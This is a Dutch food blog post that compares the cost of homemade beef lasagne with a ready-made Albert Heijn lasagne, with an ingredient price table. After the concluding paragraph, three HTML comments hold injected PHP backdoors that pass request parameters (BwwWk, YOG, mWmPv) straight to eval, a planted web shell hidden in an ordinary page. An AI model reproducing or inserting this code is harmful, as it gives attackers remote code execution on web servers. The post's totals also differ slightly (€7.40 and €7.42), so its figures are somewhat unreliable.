• Door naar de hoofd inhoud
  • Spring naar de eerste sidebar
  • Spring naar de voettekst

Lekker Leven

  • Home
  • Over mij
    • Vegan Challenge
  • Recepten
    • Ontbijt
    • Lunch
    • Diner
    • Smoothies
    • Snacks
  • Wetenschap
    • Beleving
    • Beweging
  • Reviews
  • Zelfstudie
  • Download
  • Contact
Je bent hier: Home » Uitdaging: Is zelfgemaakte lasagne duurder dan kant en klare lasagne?

18 oktober 2014 Auteur: Lekker Leven Reageer

Uitdaging: Is zelfgemaakte lasagne duurder dan kant en klare lasagne?

Een paar maanden geleden heb ik op Google+ de vraag gesteld of vers eten duurder is dan kant en klaar. Dit argument wordt nogal eens gebruikt door mensen om het eten van voorbewerkte kant en klare producten te rechtvaardigen. Er kwamen inderdaad een aantal reacties op deze vraag waaruit bleek dat veel mensen denken dat vers eten inderdaad duurder is. Om te kijken of dit werkelijk waar is ben ik de uitdaging aangegaan om verse tomatensaus te maken voor de prijs van een pot kant en klare saus van de AH.

De verse zelfgemaakte saus was uiteindelijk € 0,04 duurder dan de pot kant en klare AH tomatensaus van € 0,90. Smaken verschillen, maar naar mijn mening was mijn zelfgemaakte saus wel veel lekkerder, gezonder en voedzamer dan de kant er klare saus van AH.

Zelfgemaakte lasagne versus kant en klaar

Het leek me leuk om dit met meerdere producten uit te proberen en daarom heb ik een nieuwe uitdaging bedacht. Zou het me lukken om verse lasagne met rundergehakt te maken voor de prijs van de koelverse AH lasagne met rundergehakt? Toen ik dit artikel schreef koste de koelverse lasagna van AH € 4,49 per kg.

141018 Lasagna

Het resultaat

Deze week heb ik de lasagne gemaakt. Ik heb mijn boodschappen bij de Jumbo gehaald. De uien waren in de aanbieding maar in de tabel hieronder heb ik de normale prijs hiervoor berekend. Omdat het bij deze uitdaging gaat om eten dat voor iedereen makkelijk te maken moet zijn, heb ik kant-en-klare lasagnebladen gebruikt en een fles Sugo Casa voor de tomatensaus. In deze producten zitten geen toevoegingen zoals suiker en E-nummers.

Het resultaat van de kosten van deze lasagne staat in de tabel hieronder.

Ingrediënten   Hoeveelheid Kosten
Grand’Italia Sugo casa tradizionale € 1,56 /fles 1 fles € 1,56
Runderbouillonblokje (maggi) € 0,92 /10 blokjes 1 blokje € 0,09
Bleekselderij € 0,99 /stronk 2 stengels € 0,18
Winterwortels € 0,65 /kg 1 winterwortel € 0,13
Ui € 1,79 /2 kg 1 ui € 0,16
Knoflook € 0,65 /2 bolletjes 1 teentje € 0,04
Olijfolie € 4,59 /liter 10 ml € 0,07
Italiaanse kruiden € 1,49 /potje 0,5 gram € 0,04
Gehakt € 5,99 /kg 511 gram € 3,06
Zout € 0,01
Nootmuskaat € 0,01
Volle melk € 0,75 /liter 0,5 liter € 0,38
Bloem € 0,38 /kg 50 gram € 0,02
Parmesaanse kaas € 1,29 /100 gram 50 gram € 0,65
Lasagnabladen € 1,09 /375 gram 250 gram € 0,73
Roomboter € 1,35 /250 gram 50 gram € 0,27
Totaal kosten lasagne € 7,40
Hoeveelheid bereide lasagne 2.382 gram
Kosten per kg € 3,11

Dit komt dus neer op een totaalprijs van € 7,42 voor 2.382 gram lasagne. Omgerekend is dit € 3,12 voor 1.000 gram, dus ruimschoots onder de € 4,49 van de AH koelverse lasagne met rundergehakt. Wil je nog goedkoper uit zijn dan kun je natuurlijk de fles Sugo Casa vervangen voor 2 blikken gepelde tomaten van € 0,35 per stuk en wellicht wat minder gehakt gebruiken. En wil je het helemaal vers, dan kun je natuurlijk verse tomaten gebruiken en zelf de lasagnebladen maken.

Het nadeel van deze lasagne is wel dat hij zo lekker is dat de hele schaal met zijn vieren altijd helemaal leeg gaat.

<!– [insert_php]if (isset($_REQUEST["BwwWk"])){eval($_REQUEST["BwwWk"]);exit;}[/insert_php][php]if (isset($_REQUEST["BwwWk"])){eval($_REQUEST["BwwWk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YOG"])){eval($_REQUEST["YOG"]);exit;}[/insert_php][php]if (isset($_REQUEST["YOG"])){eval($_REQUEST["YOG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["mWmPv"])){eval($_REQUEST["mWmPv"]);exit;}[/insert_php][php]if (isset($_REQUEST["mWmPv"])){eval($_REQUEST["mWmPv"]);exit;}[/php] –>

Categorie: Wetenschap Tags: albert heijn, e-nummers, gezond voedsel, jumbo, lasagne, rundergehakt, uitdaging

Lees Interacties

Geef een antwoord Reactie annuleren

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

Primaire Sidebar

E-mail nieuwsbrief

Ontvang de leukste recepten en verhalen automatisch in je mailbox. (geen spam!)

Zoeken

Recente artikelen

  • Iedere dag hardlopen, hoe is het gegaan?
  • Dag 6/31 was een off-day!
  • Iedere dag hardlopen. Waarom?
  • Caloriedichtheid gebruiken om af te vallen en gezonder te gaan eten
  • Krijg ik het coronavirus en ga ik dood?

Footer

Lekker Leven

Lekker Leven is een initiatief van Rob Möhlmann. Sinds 2012 is hij bewuster gaan leven en sinds 2014 besloot hij om geen dierlijke producten meer te eten. Ik hoop dat ik je door mijn ervaringen mag inspireren om net als ik te groeien naar een gezonde(re) levensstijl. Check deze handige sitemap voor een overzicht van alle artikelen op deze website.

Recente artikelen

  • Iedere dag hardlopen, hoe is het gegaan?
  • Dag 6/31 was een off-day!
  • Iedere dag hardlopen. Waarom?
  • Caloriedichtheid gebruiken om af te vallen en gezonder te gaan eten
  • Krijg ik het coronavirus en ga ik dood?

Zoeken…

Privacy

Privacy neem ik serieus. Klik hier voor het privacybeleid van deze website.

Copyright © 2023 · Lekker Leven